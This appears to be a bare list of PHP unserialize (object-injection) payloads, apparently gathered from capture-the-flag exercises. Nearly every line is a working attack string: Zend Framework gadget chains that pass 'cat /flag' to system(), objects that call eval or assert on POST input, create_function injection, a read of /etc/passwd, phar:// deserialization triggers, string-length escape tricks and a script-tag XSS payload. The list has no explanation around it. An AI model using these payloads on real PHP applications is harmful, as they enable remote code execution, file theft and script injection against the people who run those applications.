";s:10:"*_helper";s:4:"call";}}s:8:"*_view";O:28:"Zend_Cache_Frontend_Function":1:{s:19:"*_specificOptions";a:3:{s:16:"cache_by_default";b:0;s:16:"cached_functions";a:0:{}s:20:"non_cached_functions";a:0:{}}}s:2:"id";s:9:"cat /flag";s:6:"helper";s:8:"formText";s:14:"*_allowEmpty";b:1;s:31:"*_autoInsertNotEmptyValidator";b:1;s:13:"*_belongsTo";N;s:15:"*_description";N;s:32:"*_disableLoadDefaultDecorators";b:0;s:17:"*_errorMessages";a:0:{}s:10:"*_errors";a:0:{}s:25:"*_errorMessageSeparator";s:2:"; ";s:11:"*_filters";a:0:{}s:10:"*_ignore";b:0;s:11:"*_isArray";b:0;s:11:"*_isError";b:0;s:17:"*_isErrorForced";b:0;s:9:"*_label";N;s:11:"*_loaders";a:0:{}s:12:"*_messages";a:0:{}s:9:"*_order";N;s:12:"*_required";b:0;s:14:"*_translator";N;s:22:"*_translatorDisabled";b:0;s:8:"*_type";N;s:14:"*_validators";a:0:{}s:18:"*_validatorRules";a:0:{}s:9:"*_value";N;s:22:"*_isPartialRendering";b:0;s:34:"*_concatJustValuesInErrorMessage";b:0;}
O:15:"Zend\Log\Logger":1:{s:10:"*writers";a:1:{i:0;O:20:"Zend\Log\Writer\Mail":3:{s:15:"*eventsToMail";a:1:{i:0;i:0;}s:21:"*subjectPrependText";s:0:"";s:24:"*numEntriesPerPriority";a:1:{i:0;O:14:"Zend\Tag\Cloud":2:{s:7:"*tags";a:1:{i:0;s:0:"";}s:15:"*tagDecorator";O:34:"Zend\Tag\Cloud\Decorator\HtmlCloud":3:{s:12:"*separator";s:0:"";s:10:"*escaper";O:20:"Zend\Escaper\Escaper":1:{s:18:"*htmlAttrMatcher";a:2:{i:0;O:23:"Zend\Filter\FilterChain":1:{s:10:"*filters";O:13:"SplFixedArray":2:{i:0;a:2:{i:0;O:14:"Zend\Json\Expr":1:{s:13:"*expression";s:9:"cat /flag";}i:1;s:10:"__toString";}i:1;s:6:"system";}}i:1;s:6:"filter";}}s:11:"*htmlTags";a:1:{s:1:"h";a:1:{s:1:"a";s:1:"!";}}}}}}}}
O:33:"Zend\Cache\Storage\Adapter\Memory":2:{s:15:"*eventHandles";a:1:{i:0;i:1;}s:9:"*events";O:30:"Zend\View\Renderer\PhpRenderer":1:{s:41:"Zend\View\Renderer\PhpRenderer__helpers";O:37:"Zend\Tag\Cloud\DecoratorPluginManager":4:{s:17:"*canonicalNames";a:2:{s:6:"detach";s:5:"cname";s:5:"cname";s:3:"any";}s:19:"*invokableClasses";a:1:{s:5:"cname";s:37:"Zend\Tag\Cloud\DecoratorPluginManager";}s:34:"*retrieveFromPeeringManagerFirst";b:0;s:15:"*initializers";a:1:{i:0;O:23:"Zend\Filter\FilterChain":1:{s:10:"*filters";O:13:"SplFixedArray":2:{i:0;a:2:{i:0;O:14:"Zend\Json\Expr":1:{s:13:"*expression";s:9:"cat /flag";}i:1;s:10:"__toString";}i:1;s:6:"system";}}}}}}
O:1:"a":1:{s:3:"act";s:24:"show_source('flag.php');";}
O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
<br>O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}
|O:4:\"test\":1:{s:4:\"name\";s:4:\"flag\";}
|O:4:"Flag":2:{s:4:"name";N;s:3:"her";N;}
compress.zlib://phar://upload/test.gif/test.txt
compress.bzip://phar:///test.phar/test.txt
compress.bzip2://phar:///test.phar/test.txt
compress.zlib://phar:///home/sx/test.phar/test.txt
php://filter/resource=phar:///test.phar/test.txt
file=phar://upload/phar1.gif/test.txt
O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:13:"Modifiervar";s:8:"flag.php";}}}
O:4:"test":2:{s:4:"user";s:116:"phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"daydream";}
O:3:"you":2:{S:9:"\00you\00body";O:2:"my":1:{s:4:"name";s:6:"myname";}S:8:"\00you\00pro";s:8:"yourname";}
O:6:"secret":1:{S:12:"\00secret\00comm";s:24:"system('sort flag.php');";}
O:6:"secret":1:{s:12:"secretcomm";s:24:"system('sort flag.php');";}
O:4:"func":1:{s:3:"key";s:136:"a:2:{i:0;O:7:"GetFlag":2:{s:4:"code";s:34:"}include("flag.php");echo $flag;//";s:6:"action";s:15:"create_function";}i:1;s:8:"get_flag";}";}
O:8:"a_object":1:{s:2:"id";i:123;}
O:8:"a_object":4:{s:3:"Id1";i:123;s:6:"*Id2";i:123;s:13:"a_objectId3";i:123;}
?s=O:6:"sercet":1:{s:12:"%00sercet%00file";s:8:"flag.php";}
O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}
O:4:"xctf":2:{s:4:"flag";s:3:"111";}
O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}
O:8:"HelloPhp":2:{s:1:"a";s:19:"eval($_POSThack);";s:1:"b";s:6:"assert";}
O:8:"HelloPhp":2:{s:1:"a";s:16:"eval(phpinfo());";s:1:"b";s:6:"assert";}
s:10:"YES I love";
O:4:test:5:{s:1:a;b:0;s:1:b;i:3;s:1:c;s:5:hello;s:1:d;a:4:{i:0;i:1;i:1;i:2;i:2;i:3;i:3;s:5:hello;}s:1:e;N;}
O:5:"Clazz":2:{s:1:"a";N;s:1:"b";R:2;}
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}            
O:5:"Start":2:{s:4:"name";O:3:"Sec":2:{s:3:"obj";O:4:"Easy":1:{s:3:"cla";N;}s:3:"var";O:4:"eeee":1:{s:3:"obj";r:1;}}s:4:"func";r:2;}
O:6:"class1":3:{s:1:"a";s:1:"1";s:4:"b";s:5:"ThisB";s:9:"class1c";s:5:"ThisC";}
O:1:"A":1:{s:4:"test";s:5:"hello";} 
wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}    
testtesttesttesttesttest&sign=hello";s:4:"sign";s:4:"eval";s:6:"number";s:4:"2000";}
a:2:{s:7:"phpflag";s:48:";s:1:"1";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
flagflagflagflagflagflag&_SESSION[function]=a";s:8:"function";s:4:"eval";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
a";s:8:"function";s:4:"eval";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
a:2:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:65:"a";s:8:"function";s:4:"eval";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"                                         